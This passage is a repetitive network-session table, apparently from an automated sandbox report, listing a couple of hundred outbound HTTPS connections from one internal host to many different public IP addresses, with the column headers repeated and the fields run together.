                                          26620192.168.2.233282837.198.37.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26621192.168.2.2344978144.212.208.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26622192.168.2.2355688198.33.61.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26623192.168.2.235163218.105.140.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26624192.168.2.2338340178.4.119.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26625192.168.2.2348614183.98.117.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26626192.168.2.2338580209.205.129.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26627192.168.2.2342718152.69.235.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26628192.168.2.2332986169.31.66.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26629192.168.2.233872034.173.156.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26630192.168.2.2356228157.28.163.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26631192.168.2.235091489.78.148.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26632192.168.2.2347874203.118.176.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26633192.168.2.233304442.168.219.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26634192.168.2.2355994176.59.239.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26635192.168.2.234659481.0.98.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26636192.168.2.235694636.209.48.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26637192.168.2.2359192176.254.12.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26638192.168.2.235171883.104.216.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26639192.168.2.2335782110.208.130.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26640192.168.2.234476061.166.41.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26641192.168.2.2359182208.139.144.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26642192.168.2.2356112123.235.85.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26643192.168.2.2349660107.132.81.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26644192.168.2.2337338183.132.63.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26645192.168.2.2338288150.229.162.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26646192.168.2.2359972119.44.214.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26647192.168.2.234143480.128.114.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26648192.168.2.2350184219.203.212.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26649192.168.2.234977620.110.220.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26650192.168.2.2353688217.157.20.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26651192.168.2.2334552208.181.11.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26652192.168.2.2351634138.2.13.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26653192.168.2.2354016117.1.110.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26654192.168.2.23486829.131.50.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26655192.168.2.2343238125.163.12.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26656192.168.2.233333663.67.131.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26657192.168.2.2360892223.184.202.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26658192.168.2.235501448.144.217.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26659192.168.2.235171443.244.143.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26660192.168.2.235286894.6.113.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26661192.168.2.2355612208.144.246.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26662192.168.2.2345432148.237.240.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26663192.168.2.235794074.10.177.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26664192.168.2.235405042.165.117.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26665192.168.2.2348080193.189.205.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26666192.168.2.235916664.57.84.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26667192.168.2.2350230193.41.91.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26668192.168.2.234407013.69.113.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26669192.168.2.235673488.234.188.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26670192.168.2.2352070172.223.148.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26671192.168.2.2352512109.145.94.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26672192.168.2.235078049.195.222.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26673192.168.2.2340974190.109.114.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26674192.168.2.2342852221.121.121.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26675192.168.2.2345366204.113.162.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26676192.168.2.2357230182.132.106.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26677192.168.2.2357200156.240.254.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26678192.168.2.2338406114.111.81.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26679192.168.2.2333158116.233.217.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26680192.168.2.2346720131.21.213.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26681192.168.2.234256886.80.182.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26682192.168.2.234507863.112.11.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26683192.168.2.2333160137.55.135.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26684192.168.2.234626854.175.103.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26685192.168.2.2335468217.40.127.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26686192.168.2.2347436205.97.63.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26687192.168.2.2354478178.119.147.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26688192.168.2.2350548176.31.107.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26689192.168.2.2352516153.35.58.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26690192.168.2.235758027.182.118.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26691192.168.2.2337254121.60.159.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26692192.168.2.235684435.14.240.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26693192.168.2.2360184201.182.22.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26694192.168.2.2358166205.46.125.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26695192.168.2.2351642196.217.219.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26696192.168.2.234993448.254.85.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26697192.168.2.233568278.183.143.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26698192.168.2.233349817.17.80.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26699192.168.2.2349208152.131.3.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26700192.168.2.235051683.178.146.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26701192.168.2.234683494.198.21.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26702192.168.2.235121425.142.26.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26703192.168.2.2338048163.109.193.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26704192.168.2.234182831.137.102.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26705192.168.2.2357836173.43.205.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26706192.168.2.2338732141.142.65.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26707192.168.2.2354070166.253.60.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26708192.168.2.23358742.196.71.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26709192.168.2.2347730178.72.242.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26710192.168.2.2333006201.68.193.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26711192.168.2.2355974137.225.187.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26712192.168.2.2352076132.248.178.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26713192.168.2.235482060.19.249.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26714192.168.2.2344740184.166.157.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26715192.168.2.2355930104.174.77.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26716192.168.2.233853079.228.207.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26717192.168.2.2341908206.39.60.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26718192.168.2.233867466.138.167.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26719192.168.2.2347692189.133.103.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26720192.168.2.2350586138.187.232.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26721192.168.2.235058049.14.191.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26722192.168.2.2354954113.25.20.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26723192.168.2.2344246209.68.98.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26724192.168.2.2333440108.29.250.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26725192.168.2.2350356141.183.145.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26726192.168.2.2340066145.177.93.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26727192.168.2.234461282.95.13.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26728192.168.2.2335592163.95.203.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26729192.168.2.233885872.145.102.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26730192.168.2.235992460.167.245.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26731192.168.2.2360376194.37.231.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26732192.168.2.2349442199.125.25.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26733192.168.2.2348552204.114.147.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26734192.168.2.2356472104.187.230.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26735192.168.2.234908212.189.244.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26736192.168.2.2351776155.188.92.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26737192.168.2.2342838186.37.216.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26738192.168.2.235139894.25.29.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26739192.168.2.2343298198.100.176.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26740192.168.2.2347888124.180.72.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26741192.168.2.235226276.70.112.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26742192.168.2.234928269.251.197.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26743192.168.2.23460529.165.193.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26744192.168.2.234509880.46.46.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26745192.168.2.233485288.83.191.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26746192.168.2.2346146136.164.185.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26747192.168.2.235961870.54.137.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26748192.168.2.2333342183.205.165.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26749192.168.2.233799265.118.10.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26750192.168.2.233987298.193.206.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26751192.168.2.2339402154.94.49.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26752192.168.2.233882297.67.68.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26753192.168.2.2341858136.230.128.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26754192.168.2.2356034213.233.54.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26755192.168.2.233570414.253.137.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26756192.168.2.2350936141.89.251.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26757192.168.2.2346732209.165.221.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26758192.168.2.2353772187.102.174.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26759192.168.2.2341044184.227.172.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26760192.168.2.2358570159.71.55.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26761192.168.2.2343422151.142.233.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26762192.168.2.233767099.127.208.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26763192.168.2.2340676134.51.186.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26764192.168.2.2342088120.203.216.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26765192.168.2.235534474.65.190.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26766192.168.2.2340324140.197.255.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26767192.168.2.23390109.95.139.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26768192.168.2.2351752144.207.31.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26769192.168.2.23531881.66.216.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26770192.168.2.23515625.27.243.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26771192.168.2.235805013.150.101.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26772192.168.2.233711271.91.110.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26773192.168.2.2347596159.218.35.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26774192.168.2.233719452.9.118.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26775192.168.2.235032246.178.173.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26776192.168.2.2358186212.70.249.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26777192.168.2.2344416150.254.133.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26778192.168.2.2336418141.77.207.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26779192.168.2.2353500204.56.68.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26780192.168.2.2337728139.42.169.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26781192.168.2.235047080.205.56.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26782192.168.2.2334342173.130.50.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26783192.168.2.2360354154.195.173.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26784192.168.2.233552889.221.7.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26785192.168.2.233437697.245.202.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26786192.168.2.23377925.149.72.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26787192.168.2.233511069.184.162.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26788192.168.2.2349980112.51.101.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26789192.168.2.235289019.220.149.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26790192.168.2.234023448.161.23.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26791192.168.2.2357050123.139.79.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26792192.168.2.2335534188.110.76.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26793192.168.2.235700845.181.101.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26794192.168.2.2349580182.218.198.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26795192.168.2.234773050.117.13.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26796192.168.2.2347428148.201.76.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26797192.168.2.2349974181.192.5.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26798192.168.2.2357886114.203.177.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26799192.168.2.2339508125.116.6.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26800192.168.2.2347654105.32.234.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26801192.168.2.2333584146.34.109.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26802192.168.2.2340782211.214.153.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26803192.168.2.235776452.103.113.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26804192.168.2.235229657.186.64.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26805192.168.2.23540921.130.213.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26806192.168.2.2357674200.102.196.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26807192.168.2.2342438141.169.61.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26808192.168.2.2357864211.21.237.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26809192.168.2.2349292133.198.179.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26810192.168.2.2339942125.78.39.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26811192.168.2.235394434.213.27.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26812192.168.2.2338592121.77.143.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26813192.168.2.23509905.247.139.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26814192.168.2.2342350130.142.252.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26815192.168.2.233686070.201.171.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26816192.168.2.2346584128.176.255.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26817192.168.2.2338864186.254.132.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26818192.168.2.2341582106.65.61.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26819192.168.2.234925263.252.152.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26820192.168.2.2350138130.44.204.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26821192.168.2.2335540152.4.144.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26822192.168.2.23419702.179.40.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26823192.168.2.2356810176.10.194.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26824192.168.2.2355712133.91.57.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26825192.168.2.2357042126.119.87.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26826192.168.2.23585509.128.20.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26827192.168.2.2347440157.48.80.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26828192.168.2.235472236.126.221.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26829192.168.2.2343194176.75.240.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26830192.168.2.2333412213.132.117.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26831192.168.2.2344426207.45.182.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26832192.168.2.233752089.185.104.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26833192.168.2.2339936189.206.117.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26834192.168.2.23575462.181.5.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26835192.168.2.234889259.61.199.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26836192.168.2.2354746144.49.61.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26837192.168.2.234057058.177.159.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26838192.168.2.2339806151.179.109.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26839192.168.2.2349104183.7.52.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26840192.168.2.2351112134.16.6.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26841192.168.2.2352136129.6.224.51443
                                          TimestampBytes transferredDirectionData


